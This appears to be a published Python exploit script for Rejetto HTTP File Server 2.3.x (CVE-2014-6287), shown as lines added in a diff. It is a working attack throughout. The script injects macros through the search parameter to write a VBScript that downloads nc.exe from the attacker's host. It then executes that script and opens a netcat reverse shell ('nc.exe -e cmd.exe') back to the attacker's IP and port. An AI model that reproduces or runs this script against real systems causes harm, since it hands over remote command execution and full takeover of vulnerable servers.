Vendor Homepage: http://rejetto.com/ +# Software Link: http://sourceforge.net/projects/hfs/ +# Version: 2.3.x +# Tested on: Windows Server 2008 , Windows 8, Windows 7 +# CVE : CVE-2014-6287 +# Description: You can use HFS (HTTP File Server) to send and receive files. +# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. +# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. + +#Usage : python Exploit.py + + +import urllib2 +import sys + +try: + def script_create(): + urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") + + def execute_script(): + urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") + + def nc_run(): + urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") + + ip_addr = "192.168.44.128" #local IP address + local_port = "443" # Local Port number + vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" + save= "save|" + vbs + vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" + exe= "exec|"+vbs2 + vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port + exe1= "exec|"+vbs3 + script_create() + execute_script() + nc_run() +except: + print """[.]Something went wrong..! + Usage is :[.] python exploit.py + Don't forgot to change the Local IP address and Port number on the script""" +